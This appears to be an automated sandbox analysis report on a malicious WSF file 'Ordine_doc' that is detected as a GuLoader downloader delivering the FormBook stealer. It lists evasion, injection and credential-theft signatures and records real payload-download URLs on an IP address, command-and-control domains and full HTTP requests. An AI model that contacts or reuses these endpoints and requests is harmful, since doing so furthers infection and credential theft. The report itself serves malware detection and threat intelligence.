Windows Analysis Report
Ordine_doc_419024001904.wsf

Overview

General Information

Sample name:	Ordine_doc_419024001904.wsf
Analysis ID:	1431462
MD5:	734c9d6b82b44237e5befe07faa4149b
SHA1:	b6a244eeb8ed209f2222b112cf2925f7eac7d1db
SHA256:	4949351915c2627905d17fe54bb56341f0af23331257e235b79eaa876fcad8cf
Tags:	wsf
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Queues an APC in another process (thread injection)

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://www.oyoing.com/gnbc/?BP-t5v1=C1gai5pWl56CEUX9IJicnlurrW3FMhatoBDmIFOQ7zGon0Xv0KBemEgaA/rlfkMV	Avira URL Cloud: Label: malware
Source: http://www.oyoing.com/;a3	Avira URL Cloud: Label: malware
Source: http://www.tyaer.com/gnbc/?URw=Rnl4c&BP-t5v1=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.tyaer.com	Virustotal: Detection: 10%	Perma Link
Source: www.oyoing.com	Virustotal: Detection: 9%	Perma Link
Source: http://87.121.105.163	Virustotal: Detection: 18%	Perma Link
Source: http://87.121.105.163/Acariatre43.chm	Virustotal: Detection: 18%	Perma Link
Source: http://87.121.105.163/icjFpYDkBweqyeZ252.bin	Virustotal: Detection: 17%	Perma Link

Multi AV Scanner detection for submitted file

Source: Ordine_doc_419024001904.wsf	ReversingLabs: Detection: 41%
Source: Ordine_doc_419024001904.wsf	Virustotal: Detection: 42%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2706108024.0000000020A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3227805976.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3226812010.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3227790923.0000000000DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3227854878.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3228055880.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2685647197.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2397711658.0000000006F9C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Core.pdb's source: powershell.exe, 00000005.00000002.2397711658.0000000006F9C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227629846.0000000000D9E000.00000002.00000001.01000000.00000007.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000002.3227696183.0000000000D9E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: ATBroker.pdb source: wab.exe, 00000009.00000003.2654569627.0000000004B7A000.00000004.00000020.00020000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227345383.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 00000009.00000002.2704809577.0000000020700000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2594338552.000000002054D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2592344262.0000000020393000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2704809577.000000002089E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3228252377.0000000004C5E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.2687837024.0000000004911000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.2685817873.0000000004764000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3228252377.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2397711658.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000009.00000002.2704809577.0000000020700000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2594338552.000000002054D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2592344262.0000000020393000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2704809577.000000002089E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3228252377.0000000004C5E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.2687837024.0000000004911000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000003.2685817873.0000000004764000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3228252377.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2387846679.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52 source: powershell.exe, 00000005.00000002.2387846679.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: wab.exe, 00000009.00000003.2654569627.0000000004B7A000.00000004.00000020.00020000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000B.00000002.3227345383.0000000000A88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2397711658.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3228649501.00000000050EC000.00000004.10000000.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000000.2756945908.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2991777439.0000000027D6C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wab.pdb source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3228649501.00000000050EC000.00000004.10000000.00040000.00000000.sdmp, VkpUSAfAICCLXDmxnjqGHDByu.exe, 0000000D.00000000.2756945908.0000000002D1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2991777439.0000000027D6C000.00000004.80000000.00040000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49716 -> 47.91.88.207:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View	IP Address: 47.91.88.207 47.91.88.207

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163

Source: global traffic	HTTP traffic detected: GET /Acariatre43.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /icjFpYDkBweqyeZ252.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gnbc/?URw=Rnl4c&BP-t5v1=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: www.tyaer.com
Source: global traffic	DNS traffic detected: DNS query: www.oyoing.com
Source: global traffic	DNS traffic detected: DNS query: www.megabet303.lol

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Apr 2024 06:13:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BDB2AF9C9B8D54202F32671A99FDCE197639D51BFF6A90216397E2A0B00Set-Cookie: _csrf=f445de3d72f34d31db2cc13c47576b485c838e64d90e6ad097960e119c19ba5ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%229Qyd7XXN84-ILww9iXyVDIv5NT3LNNax%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 47 47 43 57 2d 42 6b 74 56 4f 38 6e 37 6c 76 43 4a 34 48 65 72 5f 6f 2d 56 56 2d 70 64 66 55 65 38 31 44 6e 37 43 77 72 6f 62 64 4d 50 73 5f 31 7a 7a 74 48 59 53 72 6c 43 5a 45 36 58 42 44 31 72 43 41 41 7a 72 73 6f 65 45 31 6d 58 44 54 5f 76 37 50 5f 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="

Source: powershell.exe, 00000002.00000002.2458414938.000001AE31CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2458414938.000001AE30304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163
Source: powershell.exe, 00000002.00000002.2458414938.000001AE30304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Acariatre43.chmP
Source: powershell.exe, 00000005.00000002.2388352009.0000000004804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Acariatre43.chmXR
Source: wab.exe, 00000009.00000003.2592801079.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2592625920.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2687613635.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBwd
Source: wab.exe, 00000009.00000002.2687527805.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2687527805.0000000004B17000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2703035148.000000001FC90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.bin
Source: wab.exe, 00000009.00000003.2592801079.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2592625920.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2687613635.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.bin1
Source: wab.exe, 00000009.00000002.2687527805.0000000004B17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.bin;
Source: wab.exe, 00000009.00000002.2703035148.000000001FC90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.binMinnsTjeduelvalenza.it/ka/icjFpYDkBweqyeZ252.bin
Source: wab.exe, 00000009.00000002.2687527805.0000000004B17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.binllI
Source: wab.exe, 00000009.00000003.2592801079.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2592625920.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2687613635.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/icjFpYDkBweqyeZ252.binr
Source: powershell.exe, 00000002.00000002.2458414938.000001AE31D37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.H
Source: powershell.exe, 00000005.00000002.2400899960.0000000006FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000002.00000002.2529825040.000001AE40151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2391197450.0000000005719000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2388352009.0000000004804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2458414938.000001AE300E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2388352009.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2388352009.0000000004804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2457236271.000001AE2E665000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: AtBroker.exe, 0000000C.00000002.3229883685.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oyoing.com/;a3
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3229883685.0000000007D2D000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3227176757.0000000002CF6000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000C.00000002.3229883685.0000000007DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oyoing.com/gnbc/?BP-t5v1=C1gai5pWl56CEUX9IJicnlurrW3FMhatoBDmIFOQ7zGon0Xv0KBemEgaA/rlfkMV
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2458414938.000001AE300E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2388352009.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000005.00000002.2391197450.0000000005719000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2391197450.0000000005719000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2391197450.0000000005719000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000005.00000002.2388352009.0000000004804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2458414938.000001AE312AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002CF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002CF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002CF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002CF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: AtBroker.exe, 0000000C.00000002.3227176757.0000000002CF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: AtBroker.exe, 0000000C.00000003.2875183015.0000000007D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000002.00000002.2529825040.000001AE40151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2391197450.0000000005719000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AtBroker.exe, 0000000C.00000003.2879047729.0000000007D99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

